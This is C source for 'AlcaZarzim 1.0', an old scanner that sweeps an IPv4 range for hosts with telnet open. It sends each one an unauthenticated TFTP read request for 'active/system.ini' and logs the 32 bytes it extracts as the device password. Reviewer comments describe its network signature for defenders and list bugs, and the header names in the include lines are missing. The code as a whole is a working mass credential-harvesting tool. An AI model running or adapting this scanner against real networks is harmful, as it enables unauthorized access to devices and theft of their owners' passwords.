/* alcazarzim */
/* $Id: alcazarzim.c,v 1.1.1.1 2002/04/13 16:16:08 neuro Exp $ */
/*
 * What this file does (as the code below shows): walk an IPv4 range and, for
 * every host whose TCP port 23 accepts a connection, send one TFTP read
 * request for "active/system.ini" to UDP port 69; if a DATA block comes back,
 * copy 32 bytes starting at offset 16 of it into `pass` and write them to the
 * log file as the device password.
 *
 * Defender's view: the on-wire pattern is fixed - a TCP connect to port 23
 * immediately followed by a TFTP RRQ for "active/system.ini" (mode "octet")
 * on UDP/69 that is never ACKed (see checktftp). Devices that hand out their
 * configuration over unauthenticated TFTP should not have that service
 * reachable from untrusted networks.
 */

/* NOTE(review): the header names were lost when this listing was extracted
 * (everything between the angle brackets is gone), so these #include lines
 * are kept as found and do not preprocess. They presumably covered the
 * stdio/stdlib/string/unistd/signal/socket/netinet/arpa headers used below. */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* Receive buffer size: a TFTP DATA packet is a 4-byte header (opcode, block
 * number) followed by at most 512 bytes of payload. */
#define BUFFER_SIZE 516

/* Shared address storage reused by both checks; `p` views it as sockaddr_in. */
struct sockaddr sa;
/* Never assigned: recvfrom() in checktftp() is called with this NULL pointer,
 * so the peer address of the reply is not recorded. */
struct sockaddr *from;
struct sockaddr_in *p;
/* Address length passed to recvfrom(); stays 0 because `from` is NULL. */
int len;
/* The one descriptor in use; the SIGALRM handlers close it to abort a
 * blocking connect()/recvfrom(). */
int fd;
/* `sent` takes the sendto() result (never checked); `recvd` is unused here. */
int sent,recvd;
/* Range bounds as returned by inet_addr() (network byte order) and the loop
 * counter, which runs in host byte order. */
unsigned long start_ip, end_ip, count;
/* Password bytes copied from the TFTP reply. All 32 bytes are overwritten in
 * checktftp(), so there is no guaranteed NUL terminator when main() prints
 * it with %s. */
char pass[32];
/* Unused in this listing. */
char str[10];
FILE *logfile;
/* Filled in by both checks but never read (there is no select() call). */
struct timeval minutetimeout;
/* Per-host timeout in seconds (argv[3]), used as the alarm() interval. */
int TIMEOUT;
int i, found;
/* Scan statistics for the log footer. */
int numhost=0, numfound=0;
double per;
u_char data2recv[BUFFER_SIZE];
/* Canned TFTP RRQ (26 bytes): opcode 0x0001, filename "active/system.ini",
 * NUL, mode "octet", NUL. */
u_char data2sent[26]={ 0x00, 0x01, 'a', 'c', 't', 'i', 'v', 'e', '/', 's', 'y', 's', 't', 'e', 'm', '.', 'i', 'n', 'i', 0x00, 'o', 'c', 't', 'e', 't', 0x00 }; // predefined tftp RRQ packet

// timeout handlers for the telnet and tftp checks
// they could be merged, but I am not sure whether close()
// is the best thing to do when connect() is not used
/* Both handlers close the global descriptor so that the blocking call in
 * progress fails and the caller returns; the signal number `s` is ignored. */
void func_alarm_tftp (int s) {
    close(fd);
    return;
}

void func_alarm_telnet (int s) {
    close(fd);
    return;
}

// default handler for the kill & co. signals
/* Writes the interrupted-scan statistics to the log and exits with status 2.
 * `per` is 0.0/0.0 (NaN) if no host has been scanned yet, and `logfile` is
 * assumed to be open. Installed from main() for SIGINT/SIGTERM/SIGQUIT
 * (the SIGKILL registration there has no effect). */
void exitnow () {
    close(fd);
    numhost=count-ntohl(start_ip);
    per=(double)(((double)numfound/(double)numhost)*100);
    fprintf(logfile,"\n statistics.. (mmh.. interrupted by user)");
    fprintf(logfile,"\n host scanned: %d", numhost);
    fprintf(logfile,"\n found : %d", numfound);
    fprintf(logfile,"\n percentage : %0.3f\%%", per);   /* "\%" is not a C escape; kept as found */
    fprintf(logfile,"\n\n------------------------------------------------------------\n");
    fclose(logfile);
    printf("\n\nscan completed (interrupted by user).");
    printf("\n\nauthor: noxious@olografix.org - thank you for using. byez.\n\n");
    exit(2);
}

// port 23 check.
// it simply attempts a connect() which, when the timeout expires,
// is closed with close() (see above)
/* Returns 0 when TCP port 23 of `ip` (host byte order) accepts a connection
 * within TIMEOUT seconds, -1 otherwise. A refused connection and an alarm
 * abort both land in the -1 branch, which does not close the descriptor
 * (after an alarm the handler has already closed it; after a plain failure it
 * stays open). The socket() result is not checked and `minutetimeout` is set
 * but not used. */
int checktelnet (unsigned long ip) {
    p=(struct sockaddr_in*)&sa;
    p->sin_family=AF_INET;
    p->sin_port=htons(23);
    p->sin_addr.s_addr= htonl(ip);
    minutetimeout.tv_sec = TIMEOUT;
    minutetimeout.tv_usec = 0;
    fd = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
    signal(SIGALRM,func_alarm_telnet);
    alarm(TIMEOUT);
    if (connect (fd, (struct sockaddr *) &sa, sizeof(sa))) {
        alarm(0);
        signal(SIGALRM,SIG_DFL);
        return (-1); // timeout case
    }
    alarm(0);
    signal(SIGALRM,SIG_DFL);
    close(fd);
    return (0); // open port case
}

// this function sends an RRQ straight to port 69 of the host.
// it does NOT implement the whole tftp protocol. once the first
// packet has been received (at most 512 bytes of the file), it does not
// send the expected acks (we do not need the whole file)
/* Return values, as consumed by main():
 *  -1  no reply within TIMEOUT seconds (or recvfrom() failed)
 *   2  reply opcode byte 5 (ERROR)
 *   1  reply opcode byte 3 (DATA) whose first payload byte is not 's'
 *   0  DATA reply: 32 bytes from offset 16 are copied into `pass`
 *   0  any other opcode as well - `pass` is then left untouched, although
 *      main() reports it as a found password
 * The UDP descriptor is only closed by the alarm handler on the timeout
 * path; on every other path it stays open. */
int checktftp (unsigned long ip) {
    p=(struct sockaddr_in*)&sa;
    p->sin_family=AF_INET;
    p->sin_port=htons(69);
    p->sin_addr.s_addr= htonl(ip);
    minutetimeout.tv_sec = TIMEOUT;
    minutetimeout.tv_usec = 0;
    bzero (data2recv, sizeof (data2recv));
    fd=socket(AF_INET,SOCK_DGRAM,0);
    sent=sendto(fd,&data2sent,26,0,(struct sockaddr*)p,sizeof(struct sockaddr)); // data2sent is defined above
    signal(SIGALRM, func_alarm_tftp);
    alarm(TIMEOUT);
    /* `from` is NULL and `len` is 0: the sender address is not recorded, so
     * the reply is not checked against the host the RRQ was sent to. */
    if (recvfrom(fd,data2recv,BUFFER_SIZE,0,from,&len)<=0) {
        alarm(0);
        signal(SIGALRM,SIG_DFL);
        bzero (data2recv, sizeof (data2recv));
        return(-1); // timeout case
        // telnet open and tftp closed.. is it an alcatel?
        // check, and if so use EXPERT mode
    }
    alarm(0);
    signal(SIGALRM,SIG_DFL);
    /* data2recv[1] is the low byte of the 16-bit TFTP opcode. */
    if (data2recv[1]==5) {
        return(2); // tftp open but the file does not exist (ERR=5)
    }
    if (data2recv[1]==3) {
        printf("tftp open..parsing file..");
        bzero (pass, sizeof (pass));
        /* offset 4 = first payload byte, after the 2-byte opcode and the
         * 2-byte block number */
        if (data2recv[4]!='s') {
            return(1); // empty file, blank password
        } else {
            for (i=0; i<32; i++) {
                pass[i]=data2recv[i+16];
            }
            return(0); // (I know, I know, a memcpy, right? :)
        }
    }
    return(0);
}

/* Prints the banner and the usage line, then exits with status 1. The
 * argument placeholders after "%s" were lost in extraction. */
void usage (char *cmd) {
    printf("\n.: AlcaZarzim 1.0 :.\n");
    printf("\nusage: %s \n\n", cmd);
    exit(1);
}

/* argv[1] start address and argv[2] end address (dotted quads parsed with
 * inet_addr(); a malformed one is not detected), argv[3] timeout in seconds,
 * argv[4] log file opened for append.
 * Exit status: 0 after a full scan, 1 on bad usage, 2 from the signal
 * handler, 3 if the log file cannot be opened. */
int main(int argc, char *argv[]) {
    struct in_addr host;
    if (argc!=5) {
        usage(argv[0]);
    } else {
        start_ip=inet_addr(argv[1]);
        end_ip=inet_addr(argv[2]);
        TIMEOUT = atoi(argv[3]);
    }
    signal(SIGINT, exitnow);
    signal(SIGTERM, exitnow);
    signal(SIGKILL, exitnow);   /* SIGKILL cannot be caught; this call has no effect */
    signal(SIGQUIT, exitnow);
    printf ("\n.: AlcaZarzim 1.0 :.\n");
    printf ("\nby [noxious] - ALL illegal and/or unhautorized use are prohibited!\n");
    printf ("\nopening file %s..", argv[4]);
    if ((logfile=fopen(argv[4], "a+"))) {
        printf ("ok.\n");
    } else {
        printf ("error.\n");
        fclose(logfile);   /* logfile is NULL here: fclose(NULL) is undefined behaviour */
        exit(3);
    }
    fprintf (logfile,"\n.: AlcaZarzim 1.0 - log file :.\n");
    fprintf (logfile,"\n start ip = %s", argv[1]);
    fprintf (logfile,"\n end ip = %s", argv[2]);
    fprintf (logfile,"\n timeout = %s sec.\n", argv[3]);
    fprintf (logfile,"\n [device ip]\t\t[password]\n\n");
    // main loop
    /* `count` runs in host byte order so that ++ walks the range; it is
     * swapped back for inet_ntoa() here and inside the checks via htonl(). */
    for (count=ntohl(start_ip); count<=ntohl(end_ip); count++) {
        host.s_addr=ntohl(count);
        printf("\nhost %s..", inet_ntoa(host));
        fflush(stdout);
        if (checktelnet(count)==0) {
            found=checktftp(count);
            if (found==0) {
                printf ("password found!");
                /* no trailing newline, unlike the other entries; `pass` may
                 * also lack a NUL terminator (see its declaration) */
                fprintf(logfile, " %s\t\t%s", inet_ntoa(host), pass);
                numfound++;
            }
            if (found==1) {
                printf ("blank password?");
                fprintf(logfile, " %s\t\tblank password?\n", inet_ntoa(host));
                numfound++;
            }
            if (found==2) {
                printf ("tftp open..error download (patched firmware?)");
                fprintf(logfile, " %s\t\terror (patched?)\n", inet_ntoa(host));
            }
            if (found==-1) {
                printf ("tftp closed (alcatel? use EXPERT).");
                fprintf(logfile, " %s\t\ttftp closed (alcatel? use EXPERT)\n", inet_ntoa(host));
                numfound++;   /* a closed tftp port is counted as a find too */
            }
        } else {
            printf ("telnet closed."); // telnet closed, checktftp() would be pointless
        }
    }
    /* numhost is 0 (and per becomes NaN) when the end address precedes the
     * start address, because the loop body then never runs. */
    numhost=count-ntohl(start_ip);
    per=(double)(((double)numfound/(double)numhost)*100);
    fprintf(logfile,"\n statistics..");
    fprintf(logfile,"\n host scanned: %d", numhost);
    fprintf(logfile,"\n found : %d", numfound);
    fprintf(logfile,"\n percentage : %0.3f\%%", per);   /* "\%" is not a C escape; kept as found */
    fprintf(logfile,"\n\n------------------------------------------------------------\n");
    fclose (logfile);
    printf("\n\nstatistics..");
    printf("\nhost scanned: %d", numhost);
    printf("\nfound : %d", numfound);
    printf("\npercentage : %0.3f\%%", per);
    printf("\n\nscan completed.");
    printf("\n\nauthor: noxious@olografix.org - thank you for using. byez.\n\n");
    return(0);
}